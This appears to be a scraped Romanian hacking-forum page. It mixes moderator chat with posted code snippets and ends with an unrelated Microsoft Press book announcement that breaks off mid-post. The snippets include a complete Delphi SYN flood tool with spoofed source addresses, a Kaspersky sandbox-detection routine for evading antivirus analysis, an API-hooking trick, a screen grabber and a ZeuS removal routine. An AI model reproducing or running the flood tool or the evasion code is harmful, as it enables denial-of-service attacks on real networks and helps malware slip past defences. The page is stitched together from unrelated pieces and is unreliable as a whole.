Nytro

Exista lucruri mai importante pe lume decat sa stai sa citesti posturi stupide, sa dai banuri sau avertismente

Da, e bine gandita

Imi place cum arata. Da, util.

Nu i-am dat ban pentru asta, i-am dat ban pentru postul cu Madalina Manole si inca 3-4 posturi stupide. Vezi toate posturile lui.

Nu, incet, incet scapam de rebuturi.

Pff ce tutoriale...

Cata inteligenta in taberele adverse. Ce te-a determinat sa faci acea exclamatie? Sunt dinamovist, ar trebui sa ma simt insultat de injuriile aduse de probabil un pusti stelist care nici macar nu merge la meciurile echipei pe care pretinde ca o sustine? Ca tot veni vorba, cine vine la meciul cu Poli la peluze, la PCH?

Sunt un gras, plin de cosuri si port ochelari. M-ai jignit. Ban? Nu ai inceput cu dreptul, un pas bun de facut ar fi sa iti ceri scuze pentru injuriile aduse si sa iti faci o mica autodescriere care sa o inlocuiasca pe cea care ne-am facut-o deja despre tine.

[NASM] Linux Sockets Author: DemonEmporer: Right so, It's been a while since I actually contributed anything. Declans Wind0ze hatin'(j/k j/k lol) got me thinkin' about somethin' I could do in linux. And reading through a few pages I noticed a lack of linux based ASM or NASM for that matter. You may find this educational, silly or totally random or all 3. Either way. So I thought in my spare time, I'd start doing some NASM linux examples(They are linux specific, not *nix. BSD has a different interpret style). Hello worlds aside I thought I'd do something slightly more interesting and throw in a socket connection. %assign SOCK_STREAM 1 %assign AF_INET 2 %assign SYS_socketcall 102 %assign SYS_SOCKET 1 %assign SYS_CONNECT 3 %assign SYS_SEND 9 %assign SYS_RECV 10 section .text global _start ;-------------------------------------------------- ;Functions to make things easier. :] ;-------------------------------------------------- _socket: mov [cArray+0], dword AF_INET mov [cArray+4], dword SOCK_STREAM mov [cArray+8], dword 0 mov eax, SYS_socketcall mov ebx, SYS_SOCKET mov ecx, cArray int 0x80 ret _connect: call _socket mov dword [sock], eax mov dx, si mov byte [edi+3], dl mov byte [edi+2], dh mov [cArray+0], eax ;sock; mov [cArray+4], edi ;&sockaddr_in; mov edx, 16 mov [cArray+8], edx ;sizeof(sockaddr_in); mov eax, SYS_socketcall mov ebx, SYS_CONNECT mov ecx, cArray int 0x80 ret _send: mov edx, [sock] mov [sArray+0],edx mov [sArray+4],eax mov [sArray+8],ecx mov [sArray+12], dword 0 mov eax, SYS_socketcall mov ebx, SYS_SEND mov ecx, sArray int 0x80 ret _exit: mov eax, 1 int 0x80 _print: mov ebx, 1 mov eax, 4 int 0x80 ret ;-------------------------------------------------- ;Main code body ;-------------------------------------------------- _start: mov esi, szIp mov edi, sockaddr_in xor eax,eax xor ecx,ecx xor edx,edx .cc: xor ebx,ebx .c: lodsb inc edx sub al,'0' jb .next imul ebx,byte 10 add ebx,eax jmp short .c .next: mov [edi+ecx+4],bl inc ecx cmp ecx,byte 4 jne .cc mov word [edi], AF_INET mov esi, szPort xor eax,eax xor ebx,ebx .nextstr1: lodsb test al,al jz .ret1 sub al,'0' imul ebx,10 add ebx,eax jmp .nextstr1 .ret1: xchg ebx,eax mov [sport], eax mov si, [sport] call _connect cmp eax, 0 jnz short _fail mov eax, msg mov ecx, msglen call _send call _exit _fail: mov edx, cerrlen mov ecx, cerrmsg call _print call _exit _recverr: call _exit _dced: call _exit section .data cerrmsg db 'failed to connect ',0xa cerrlen equ $-cerrmsg msg db 'DIE DIE DIE!',0xa msglen equ $-msg szIp db '127.0.0.1',0 szPort db '256',0 section .bss sock resd 1 ;general 'array' for syscall_socketcall argument arg. cArray resd 1 resd 1 resd 1 resd 1 ;send 'array'. sArray resd 1 resd 1 resd 1 resd 1 ;duh? sockaddr_in resb 16 ;.. sport resb 2 buff resb 1024 Assemble: nasm -o socket.o -f elf32 -g socket.asm Link: ld -o socket socket.o It uses 0 external libraries, hence the ld link line. Next time, we might do something with GTK(QT has a CPP interface and is more annoying to call from ASM XD). If you have any questions, feel free to ask and I'll answer as best I can.

[C] ZeuS Killer Author: Nu stiu... #include <windows.h> #pragma warning(disable : 4005) // macro redefinition #include <ntdll.h> #pragma warning(default : 4005) #include <shlwapi.h> #include <shlobj.h> void GetZeusInfo(ULONG dwArg, PCHAR lpOut, DWORD dwOutLn, PCHAR lpMutex, DWORD dwMutexLn) { PSYSTEM_HANDLE_INFORMATION shi = 0; NTSTATUS Status = 0; ULONG len = 0x2000; POBJECT_NAME_INFORMATION obn = 0; HANDLE proc = 0, thandle = 0, hFile = 0; BOOLEAN enable = FALSE; UCHAR name[300] = {0}; ULONG temp = 0, rw = 0; do { shi = (PSYSTEM_HANDLE_INFORMATION)malloc(len); if (shi == 0) { return; } Status = NtQuerySystemInformation(SystemHandleInformation, shi, len, NULL); if (Status == STATUS_INFO_LENGTH_MISMATCH) { free(shi); len *= 2; } else if (NT_ERROR(Status)) { free(shi); return; } } while (Status == STATUS_INFO_LENGTH_MISMATCH); RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, 1, 0, &enable); for (int i=0; i<(int)shi->uCount; i++) { proc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, shi->aSH[i].uIdProcess); if (proc == 0) { continue; } Status = NtDuplicateObject(proc, (HANDLE)shi->aSH[i].Handle, NtCurrentProcess(), &thandle, 0, 0, DUPLICATE_SAME_ACCESS); if (NT_ERROR(Status)) { NtClose(proc); continue; } Status = NtQueryObject(thandle, ObjectNameInformation, 0, 0, &len); if (Status != STATUS_INFO_LENGTH_MISMATCH || len == 0) { NtClose(thandle); NtClose(proc); continue; } obn = (POBJECT_NAME_INFORMATION)malloc(len); if (obn == 0) { NtClose(thandle); NtClose(proc); continue; } Status = NtQueryObject(thandle, ObjectNameInformation, obn, len, &len); if (NT_ERROR(Status) || obn->Name.Buffer == 0) { free(obn); NtClose(thandle); NtClose(proc); continue; } RtlZeroMemory(name, sizeof(name)); WideCharToMultiByte(CP_ACP, 0, obn->Name.Buffer, obn->Name.Length >> 1, (LPSTR)name, 300, NULL, NULL); if (strstr((LPSTR)name, "__SYSTEM__") || strstr((LPSTR)name, "_AVIRA_")) { lstrcpyW((LPWSTR)name, L"\\\\.\\pipe\\"); lstrcatW((LPWSTR)name, obn->Name.Buffer); __retry: hFile = CreateFileW((LPWSTR)name, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (hFile == INVALID_HANDLE_VALUE) { WaitNamedPipeW((LPWSTR)name, INFINITE); hFile = CreateFileW((LPWSTR)name, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (hFile == INVALID_HANDLE_VALUE) { WCHAR wszBNO[] = { L"\\BaseNamedObjects\\" }; if (LPWSTR wszBNOPos = StrStrW((LPWSTR)name, wszBNO)) { lstrcpyW((LPWSTR)name, L"\\\\.\\pipe\\"); lstrcatW((LPWSTR)name, (LPWSTR)((PBYTE)wszBNOPos + (sizeof(wszBNO) - 1 * sizeof(WCHAR)))); goto __retry; } free(obn); NtClose(thandle); NtClose(proc); continue; } } temp = PIPE_READMODE_MESSAGE; if (!SetNamedPipeHandleState(hFile, &temp, 0, 0)) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } temp = dwArg; if (!WriteFile(hFile, &temp, 4, &rw, 0)) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } temp = 0; if (!WriteFile(hFile, &temp, 4, &rw, 0)) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } temp = 0; if (!WriteFile(hFile, &temp, 0, &rw, 0)) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } temp = 0; if (!ReadFile(hFile, &temp, 4, &rw, 0)) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } temp = 0; if (!ReadFile(hFile, &temp, 4, &rw, 0)) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } if (temp > MAX_PATH) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } rw = temp; temp = (ULONG)malloc(temp); if (!temp) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } if (!ReadFile(hFile, (PVOID)temp, rw, &rw, 0)) { free((PVOID)temp); CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } if ( (temp) && lstrlenW((LPCWSTR)temp) < (int)dwOutLn) { RtlZeroMemory(lpOut, dwOutLn); WideCharToMultiByte(CP_ACP, 0, (PWCHAR)temp, lstrlenW((LPCWSTR)temp), (LPSTR)lpOut, dwOutLn, NULL, NULL); } if (lpMutex) { LPWSTR lpwMutexName = obn->Name.Buffer; LPWSTR lpwTemp; while (lpwTemp = StrStrW(lpwMutexName, L"\\")) { lpwMutexName = lpwTemp + 1; } RtlZeroMemory(lpMutex, dwMutexLn); WideCharToMultiByte(CP_ACP, 0, lpwMutexName, lstrlenW(lpwMutexName), (LPSTR)lpMutex, dwMutexLn, NULL, NULL); } free((PVOID)temp); CloseHandle(hFile); } free(obn); NtClose(thandle); NtClose(proc); } } BOOL DeleteHiddenFile(PCHAR szPath) { SetFileAttributes(szPath, FILE_ATTRIBUTE_ARCHIVE); return DeleteFile(szPath); } #define ZEUS_FASTCLEAN BOOL KillZeus() { // Getting info CHAR szMutexName[MAX_PATH] = {0}; CHAR szZeusPath[MAX_PATH]; GetZeusInfo(11, szZeusPath, sizeof szZeusPath, szMutexName, sizeof szMutexName); if (!strlen(szMutexName)) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : ERROR : Cannot get szMutexName"); #endif return FALSE; } #ifndef ZEUS_FASTCLEAN CHAR szZeusConfig[MAX_PATH]; GetZeusInfo(12, szZeusConfig, sizeof szZeusConfig, NULL, NULL); CHAR szZeusLog[MAX_PATH]; GetZeusInfo(13, szZeusLog, sizeof szZeusLog, NULL, NULL); #endif #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : INFO : 0.) Mutex \"%s\"", szMutexName); OutputDebugStringEx(__FUNCTION__" : INFO : 1.) Path \"%s\"", szZeusPath); #ifndef ZEUS_FASTCLEAN OutputDebugStringEx(__FUNCTION__" : INFO : 2.) Config \"%s\"", szZeusConfig); OutputDebugStringEx(__FUNCTION__" : INFO : 3.) Log \"%s\"", szZeusLog); #endif #endif // Killing GetZeusInfo(3, NULL, NULL, NULL, NULL); // Waiting HANDLE hMutex; for (INT i = 0; i < 10; i++) { hMutex = OpenMutex(MUTANT_QUERY_STATE|SYNCHRONIZE|STANDARD_RIGHTS_REQUIRED, FALSE, szMutexName); if (!hMutex) break; CloseHandle(hMutex); Sleep(1000); } if (hMutex) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : ERROR : hMutex is still active"); #endif return FALSE; } // Deleting files if (!DeleteHiddenFile(szZeusPath)) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusPath); #endif } #ifndef ZEUS_FASTCLEAN if (!DeleteHiddenFile(szZeusConfig)) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusConfig); #endif } if (!DeleteHiddenFile(szZeusLog)) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusLog); #endif } #endif #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : INFO : EXIT"); #endif return TRUE; }

[Delphi] Screen Capture with parameters Author: zoom (cred) program ScreenShot; uses Windows, Graphics, Jpeg; procedure ScreenToFile(FileName: string; Quality: Word; Percent: Word); var Bmp: TBitmap; Jpg: TJpegImage; begin Bmp := TBitmap.Create; Jpg := TJpegImage.Create; try Bmp.Width := GetDeviceCaps(GetDc(0), 8) * Percent div 100; Bmp.Height := GetDeviceCaps(GetDc(0), 10) * Percent div 100; SetStretchBltMode(Bmp.Canvas.Handle, HALFTONE); StretchBlt(Bmp.Canvas.Handle, 0, 0, Bmp.Width, Bmp.Height, GetDc(0), 0, 0, GetDeviceCaps(GetDc(0), 8), GetDeviceCaps(GetDc(0), 10), SRCCOPY); Jpg.Assign(Bmp); Jpg.CompressionQuality := Quality; Jpg.SaveToFile(FileName); finally Jpg.free; Bmp.free; end; end; begin ScreenToFile('SHOT.JPG', 50, 70); end.

[Delphi] Bypass KAV 2010 Sandbox Author: chaincoder program KAV; uses WINDOWS,sysutils; PROCEDURE SAVE(NEWDROPPATH:STRING); var F:FILE; BUFFERSTRING :STRING; BEGIN AssignFile(F, NewDropPath); Rewrite(F, 1); BUFFERSTRING:='555555555555555555555555555'; If (IOResult = 0) Then Begin BlockWrite(F, BufferString[1], Length(Bufferstring)); CloseFile(F); End; END; Function TranslateMacro(Macro: String): String; Var Size :Cardinal; Output :Array[0..MAX_PATH] of Char; Begin Result := ''; FillChar(Output, SizeOf(Output), #0); Size := SizeOf(Output); Size := GetEnvironmentVariable(PChar(Macro), Output, Size); If (Size > 0) Then Result := Output; End; VAR DAT : STRING; KIS : STRING; APP : STRING; i : INTEGER; FOUND : BOOLEAN; begin DAT:=TranslateMacro('APPDATA'); DELETE(DAT,1,2); FOR I:=0 to 100 do begin KIS:=TranslateMacro('ALLUSERSPROFILE')+'\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume'+inttostr(i)+DAT+'\1.TXT'; DELETEFILE(kis); end; FOR I:=0 to 100 do begin KIS:=TranslateMacro('ALLUSERSPROFILE')+'\Application Data\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume'+inttostr(i)+DAT+'\1.TXT'; DELETEFILE(kis); end; app:= TranslateMacro('APPDATA')+'\1.txt'; save(app); FOUND:=false; FOR I:=0 to 100 do begin KIS:=TranslateMacro('ALLUSERSPROFILE')+'\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume'+inttostr(i)+DAT+'\1.TXT'; if fileexists(kis) THEN BEGIN FOUND:=TRUE; BREAK; END; end; FOR I:=0 to 100 do begin KIS:=TranslateMacro('ALLUSERSPROFILE')+'\Application Data\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume'+inttostr(i)+DAT+'\1.TXT'; if fileexists(kis) THEN BEGIN FOUND:=TRUE; BREAK; END; end; // deleteFILE(win); if FOUND then MESSAGEBOX(0,pchar('RUNNING INSIDE KAV)'),'STATUS',0) ELSE MESSAGEBOX(0,pchar('NOT RUNNING INSIDE KAV)'),'STATUS',0) ; end.

[Delphi] Simple Resource API Replacement Author: steve10120@ic0de.org // steve10120@ic0de.org program Test; uses Windows, SysUtils; {$R resource.Res} // resource.rc = EXE FILE "Hello.exe" // type { Resource Dir String } PImageResourceDirString = ^TImageResourceDirString; TImageResourceDirString = packed record Length: Word; NameString: array[0..0] of WCHAR; end; { Data Entry } PImageResourceDataEntry = ^TImageResourceDataEntry; TImageResourceDataEntry = packed record OffsetToData: DWORD; Size: DWORD; CodePage: DWORD; Reserved: DWORD; end; { Dir Entry } PImageResourceDirectoryEntry = ^TImageResourceDirectoryEntry; TImageResourceDirectoryEntry = packed record Name: DWORD; OffsetToData: DWORD; end; { Directory } PImageResourceDirectory = ^TImageResourceDirectory; TImageResourceDirectory = packed record Characteristics: DWORD; TimeDateStamp: DWORD; MajorVersion: Word; MinorVersion: Word; NumberOfNamedEntries: Word; NumberOfIdEntries: Word; end; const IMAGE_RESOURCE_DATA_IS_DIRECTORY: DWORD = $80000000; IMAGE_STRIP_HIGH_BIT: DWORD = $7FFFFFFF; function StripHighBit(dwValue:DWORD):DWORD; begin Result := dwValue and IMAGE_STRIP_HIGH_BIT; end; function IsDirectory(dwValue:DWORD):Boolean; begin Result := FALSE; if ((dwValue and IMAGE_RESOURCE_DATA_IS_DIRECTORY) <> 0) then Result := TRUE; end; function WideCharToMultiByteEx(var lp: PWideChar): string; // function from ErazerZ's UntPeFile var len: Word; begin len := Word(lp^); SetLength(Result, len); Inc(lp); WideCharToMultiByte(CP_ACP, 0, lp, Len, PChar(Result), Len +1, nil, nil); Inc(lp, len); Result := PChar(Result); end; function GetResource(szResourceType:string; szResourceName:string; var pResource:Pointer; var dwResourceSize:DWORD):Boolean; var IDH: PImageDosHeader; INH: PImageNtHeaders; i: DWORD; RootIRD: PImageResourceDirectory; SubIRD: PImageResourceDirectory; DataIRD: PImageResourceDirectory; RootEntry: PImageResourceDirectoryEntry; SubEntry: PImageResourceDirectoryEntry; DataEntry: PImageResourceDirectoryEntry; ResData: PImageResourceDataEntry; ResType: PImageResourceDirString; ResName: PImageResourceDirString; hModule: DWORD; szResType: string; szResName: string; begin Result := FALSE; hModule := GetModuleHandle(nil); if (hModule <> 0) then begin IDH := Pointer(hModule); if (IDH^.e_magic = IMAGE_DOS_SIGNATURE) then begin INH := Pointer(hModule + IDH^._lfanew); if (INH^.Signature = IMAGE_NT_SIGNATURE) then begin if (INH^.OptionalHeader.DataDirectory[2].VirtualAddress > 0) then begin RootIRD := Pointer(hModule + INH^.OptionalHeader.DataDirectory[2].VirtualAddress); RootEntry := Pointer(DWORD(RootIRD) + SizeOf(TImageResourceDirectory)); for i := 0 to (RootIRD^.NumberOfNamedEntries + RootIRD^.NumberOfIdEntries) - 1 do begin if (IsDirectory(RootEntry^.Name)) then begin ResType := Pointer(hModule + INH^.OptionalHeader.DataDirectory[2].VirtualAddress + StripHighBit(RootEntry^.Name)); szResType := WideCharToMultiByteEx(PWideChar(DWORD(ResType))); if (szResType = szResourceType) then begin SubIRD := Pointer(DWORD(RootIRD) + StripHighBit(RootEntry^.OffsetToData)); SubEntry := Pointer(DWORD(SubIRD) + SizeOf(TImageResourceDirectory)); if (IsDirectory(SubEntry^.Name)) then begin ResName := Pointer(DWORD(RootIRD) + StripHighBit(SubEntry^.Name)); szResName := WideCharToMultiByteEx(PWideChar(DWORD(ResName))); if (szResName = szResourceName) then begin Result := TRUE; DataIRD := Pointer(DWORD(RootIRD) + StripHighBit(SubEntry^.OffsetToData)); DataEntry := Pointer(DWORD(DataIRD) + SizeOf(TImageResourceDirectory)); ResData := Pointer(DWORD(RootIRD) + DataEntry^.OffsetToData); pResource := Pointer(hModule + ResData^.OffsetToData); dwResourceSize := ResData^.Size; Exit; end; end; end; end; Inc(RootEntry); end; end; end; end; end; end; var pRes: Pointer; dwSize: DWORD; szMsg: string; begin if (GetResource('FILE', 'EXE', pRes, dwSize)) then begin szMsg := 'Address: ' + IntToHex(DWORD(pRes), 8) + #13#10 + 'Size: ' + IntToHex(dwSize, 8) + #13#10 + 'First byte: ' + IntToHex(PByte(pRes)^, 0); MessageBoxA(0, PChar(szMsg), 'RESOURCES', 0); end; end.

[Delphi] SYN Flood Author: carbon (cred) program SynFlood; {$APPTYPE CONSOLE} uses Windows, Winsock; //WinSock2; const IP_HDRINCL = 2; // IP Header Include Header_SEQ = $19026695; SEQ = $28376839; SYN_DEST_IP = '172.17.103.127'; //????IP FAKE_IP = '10.168.150.1'; //??IP???????????IP????B??? //TCP? 20? type TCP_HEADER = record th_sport : Word; //16???? th_dport : Word; //16????? th_seq : DWORD; //32???? th_ack : DWORD; //32???? th_lenres : Byte; //4?????+6??????4? th_flag : Byte; //2????+6???? 2?SYN?1?FIN?16?ACK?? th_win : Word; //16????? th_sum : Word; //16???? th_urp : Word; //16???????? end; // IP ? 20? type IP_HEADER = record h_verlen : Byte; //4?????+4?IP??? tos : Byte; //8?????TOS?????????????????????????? total_len : Word; //16???????? IP????????????????20??? ident : Word; //16?IP????????????????????? frag_and_flags : Word; //Fragment Offset 13 IP?????? ttl : Byte; //8?????TTL??????????????? proto : Byte;//8????(TCP, UDP ???) ???ICMP?1?IGMP?2?TCP?6?UDP?17? checksum : Word; //16?IP????? sourceIP : LongWord; //32??IP?? destIP : LongWord; //32???IP?? end; //TCP?? 12? type PSD_HEADER = record saddr : DWORD; //??? daddr : DWORD; //???? mbz : Byte; //?? ptcl : Byte; //???? tcpl : WORD; //TCP?? end; type CLIENTPARA = record Port:integer; IP:string; end; var clientpa :^CLIENTPARA; SendSEQ :Integer = 0; TimeOut :Integer =5000; function WSASocketA(af, wType, protocol: integer;lpProtocolInfo: pointer;g, dwFlags: dword): integer;stdcall;external 'ws2_32.dll'; function setsockopt( const s: TSocket; const level, optname: Integer; optval: PChar; const optlen: Integer ): Integer; stdcall;external 'ws2_32.dll'; function IntToStr(I: integer): string; begin Str(I, Result); end; function StrToInt(S: string): integer; begin Val(S, Result, Result); end; function LowerCase(const S: string): string; var Ch: Char; L: Integer; Source, Dest: PChar; begin L := Length(S); SetLength(Result, L); Source := Pointer(S); Dest := Pointer(Result); while L <> 0 do begin Ch := Source^; if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32); Dest^ := Ch; Inc(Source); Inc(Dest); Dec(L); end; end; { CheckSum:????????? IP?????????????IP??????????0?IP_HEADER.checksum=0?, ??????IP???????????????? TCP??????IP???????????????????????????? ??TCP??????????????????????TCP??????? ???TCP??????????????TCP??????? } function checksum(var Buffer; Size: integer): word; type TWordArray = array[0..1] of word; var lSumm: LongWord; iLoop: integer; begin lSumm := 0; iLoop := 0; while Size > 1 do begin lSumm := lSumm + TWordArray(Buffer)[iLoop]; inc(iLoop); Size := Size - SizeOf(word); end; if Size = 1 then lSumm := lSumm + Byte(TWordArray(Buffer)[iLoop]); lSumm := (lSumm shr 16) + (lSumm and $FFFF); lSumm := lSumm + (lSumm shr 16); Result := word(not lSumm); end; //syn???? function SynFloodThreadProc(p:Pointer):LongInt;stdcall; var WSAData :TWSAData; sock :TSocket; Remote :TSockAddr; ipHeader :IP_HEADER; tcpHeader :TCP_HEADER; psdHeader :PSD_HEADER; ErrorCode,bOpt,counter,FakeIpNet,FakeIpHost,datasize :integer; Buf :array [0..127] of char; //FromIP :string; begin Result :=0; //????????? if WSAStartup(MAKEWORD(2,2), WSAData)<>0 then exit; sock :=WSASocketA(AF_INET, SOCK_RAW, IPPROTO_RAW, nil, 0, {WSA_FLAG_OVERLAPPED}0); if sock = INVALID_SOCKET then exit; //??ip?? bOpt := 1; //??IP_HDRINCL????????IP?????????? if setsockopt(sock,IPPROTO_IP, IP_HDRINCL,@bOpt, SizeOf(bOpt)) = SOCKET_ERROR then exit; //?????? //ErrorCode :=setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,pchar(TimeOut),sizeof(TimeOut)); //if ErrorCode = SOCKET_ERROR then exit; Randomize; FillChar(Remote,sizeof(Remote),#0); Remote.sin_family :=AF_INET; //Remote.sin_addr.s_addr:=inet_addr(SYN_DEST_IP); Remote.sin_addr.S_addr :=inet_addr(pchar(CLIENTPARA(p^).IP)); Remote.sin_port :=htons(CLIENTPARA(p^).Port); FakeIpNet:=inet_addr(FAKE_IP); FakeIpHost:=ntohl(FakeIpNet); //??IP?? ipHeader.h_verlen :=(4 shl 4) or (sizeof(ipHeader) div sizeof(LongWord)); //???IP??????????? ipHeader.total_len :=htons(sizeof(ipHeader)+sizeof(tcpHeader)); //16???????? ipHeader.ident:=1; //16??? ipHeader.tos :=0; //IP???? ipHeader.frag_and_flags:=0; //???? ipHeader.ttl:=128; //8?????TTL ipHeader.proto:=IPPROTO_TCP; //8???(TCP,UDP…) UDP=17 $11 ipHeader.checksum:=0; //16?IP????? ipHeader.sourceIP:=htonl(FakeIpHost+SendSEQ); //32??IP?? //ipHeader.destIP:=inet_addr(pchar(SYN_DEST_IP)); //32???IP?? ipHeader.destIP:=inet_addr(pchar(CLIENTPARA(p^).IP)); //??????? {FromIP:=IntToStr(Random(254)+1)+'.'+ IntToStr(Random(254)+1)+'.'+ IntToStr(Random(254)+1)+'.'+Inttostr(Random(254)+1); ipHeader.sourceIP:=inet_Addr(PChar(FromIP)); //32??IP?? ipHeader.destIP:=Remote.sin_addr.S_addr; //32???IP?? } //??TCP?? tcpHeader.th_sport:=htons(Random(65536)+1); //??????? tcpHeader.th_dport:=Remote.sin_port; //????? //tcpHeader.th_sport:=htons(7000); //???? //tcpHeader.th_dport:=htons(8080); //????? tcpHeader.th_seq:=htonl(SEQ+SendSEQ); //SYN??? tcpHeader.th_ack:=0; //ACK?????0 tcpHeader.th_lenres:=(sizeof(tcpHeader) shr 2 shl 4) or 0; //TCP?????? tcpHeader.th_flag:=2; //???????????2?SYN?1?FIN?16?ACK?? tcpHeader.th_win:=htons(16384); //???? tcpHeader.th_urp:=0; //????? tcpHeader.th_sum:=0; //??? //??TCP??????????????????? psdHeader.saddr:=ipHeader.sourceIP; //??? psdHeader.daddr:=ipHeader.destIP; //???? psdHeader.mbz:=0; psdHeader.ptcl:=IPPROTO_TCP; //???? psdHeader.tcpl:=htons(sizeof(tcpHeader)); //TCP???? while true do begin //???10,240?????????? //writeln('.'); for counter:=0 to 10239 do begin inc(SendSEQ); if (SendSEQ=65536) then SendSEQ :=1; //????? //??IP?? ipHeader.checksum :=0; //16?IP????? ipHeader.sourceIP :=htonl(FakeIpHost+SendSEQ); //32??IP?? //??TCP?? tcpHeader.th_seq :=htonl(SEQ+SendSEQ); //SYN??? tcpHeader.th_sum :=0; //??? //??TCP??? psdHeader.saddr :=ipHeader.sourceIP; //??TCP??????????????TCP??? FillChar(Buf,SizeOf(Buf),#0); //??????????????Buf????TCP???? CopyMemory(@Buf[0],@psdHeader,SizeOf(psdHeader)); //12 CopyMemory(@Buf[SizeOf(psdHeader)],@tcpHeader,SizeOf(tcpHeader)); //20 TCPHeader.th_sum:=checksum(Buf,SizeOf(psdHeader)+SizeOf(tcpHeader)); //32 //??IP???? CopyMemory(@Buf[0],@ipHeader,SizeOf(ipHeader)); //20 CopyMemory(@Buf[SizeOf(ipHeader)],@tcpHeader,SizeOf(tcpHeader)); //20 FillChar(Buf[SizeOf(ipHeader)+SizeOf(tcpHeader)],4,#0); datasize :=SizeOf(ipHeader)+SizeOf(tcpHeader); ipHeader.checksum:=checksum(Buf,datasize); //40 //??????? CopyMemory(@Buf[0],@ipHeader,SizeOf(ipHeader)); //20 //??TCP?? ErrorCode:=sendto(sock, buf, datasize, 0, Remote, sizeof(Remote)); if ErrorCode=SOCKET_ERROR then exit; write('.'); end; //end for writeln(''); end; //end while closesocket(sock); WSACleanup(); end; procedure Usage; begin WriteLn('SynFlood 0.1 for 2000/XP/2003'); WriteLn('http://www.wrsky.com'); WriteLn('hnxyy@hotmail.com'); WriteLn('QQ:19026695'); WriteLn; WriteLn('Usage: SynFlood -h:IP -p:port'); end; procedure ParseOption(Cmd, Arg: string); begin if arg='' then begin Usage; Halt(0); end; if lstrcmp('-h:', pchar(LowerCase(Cmd))) = 0 then begin clientpa^.IP :=arg; end else if lstrcmp('-p:', pchar(LowerCase(Cmd))) = 0 then begin clientpa^.Port :=StrToInt(Arg); end else begin Usage; Halt(0); end; end; procedure ProcessCommandLine; var CmdLn: integer; begin CmdLn := 1; if (ParamCount<2) or (ParamCount>2) then begin Usage; Halt(0); end; new(clientpa); while Length(ParamStr(CmdLn)) <> 0 do begin ParseOption(Copy(ParamStr(CmdLn), 1, 3), Copy(ParamStr(CmdLn), 4, Length(ParamStr(CmdLn)) - 2)); Inc(CmdLn); end; end; var ThreadID:DWord; begin ProcessCommandLine; CreateThread(nil, 0, @SynFloodThreadProc, clientpa, 0, ThreadID); while True do Sleep(1); end.

[snippet] API Spoofing Author: carbon (cred) procedure CopyMemory(Destination, Source:Pointer; dwSize:DWORD); asm PUSH ECX PUSH ESI PUSH EDI MOV EDI, Destination MOV ESI, Source MOV ECX, dwSize REP MOVSB POP EDI POP ESI POP ECX end; var pMsgBoxA: Pointer; pOther: Pointer; pCode: Pointer; dwNull: Pointer; dwRelative: DWORD; xMessageBoxA: function(hWindow:HWND; lpText:PChar; lpCaption:PChar; uStyle:UINT):UINT; stdcall; begin pMsgBoxA := GetProcAddress(LoadLibraryA('user32.dll'), 'MessageBoxA'); pOther := GetProcAddress(LoadLibraryA('user32.dll'), 'GetTopWindow'); pCode := VirtualAlloc(nil, 10, MEM_COMMIT, PAGE_READWRITE); if ((Assigned(pMsgBoxA)) and (Assigned(pOther)) and (Assigned(pCode))) then begin PByte(pCode)^ := $55; // PUSH EBP PByte(DWORD(pCode) + 1)^ := $8B; // MOV EBP >> PByte(DWORD(pCode) + 2)^ := $EC; // , ESP dwRelative := DWORD(pMsgBoxA) - DWORD(pOther); PByte(DWORD(pCode) + 3)^ := $E9; // JMP PDWORD(DWORD(pCode) + 4)^ := dwRelative - 3; // user32.MessageBoxA // - 3 because the JMP is @ + 3 VirtualProtect(pOther, 10, PAGE_EXECUTE_READWRITE, @dwNull); CopyMemory(pOther, pCode, 10); VirtualFree(pCode, 0, MEM_RELEASE); xMessageBoxA := Pointer(@GetTopWindow); xMessageBoxA(0, 'Spoofed API', 'TEST', 0); end; end.

Moving to Microsoft Visual Studio 2010 Developers, we’re pleased to announce another free offering: Moving to Microsoft Visual Studio 2010 (Microsoft Press, 2011; 336 pages), written by Patrice Pelland, Pascal Paré, and Ken Haines. Here’s a little bit about the authors: Ken Haines is a software development engineer at Microsoft, working in the Consumer and Online Division. He has a passion for distributed applications in the cloud and strives to help customers and partners find the right solution for their needs. Pascal Paré has worked at Microsoft since 2006, where he has held positions as a software engineer on both development and testing teams. Patrice Pelland is a principal development manager at Microsoft, working in the Consumer and Online Division. He leads a development team that is focused on innovation and incubation across all Microsoft consumer products. Moving to Microsoft Visual Studio 2010 was written with three audiences in mind: Part I is for developers moving from Visual Studio 2003 to Visual Studio 2010. Part II is for developers moving from Visual Studio 2005. And Part III is for developers moving from Visual Studio 2008. Please see this post for an extensive description of the book’s content, including “Who Is This Book for?,” “What Is the Book About?,” and “How Will This Book Help Me Move to Visual Studio 2010?” (Note that the links in that post are to a draft preview version of the book. Links to the final and complete book appear immediately below in this post.) Download: 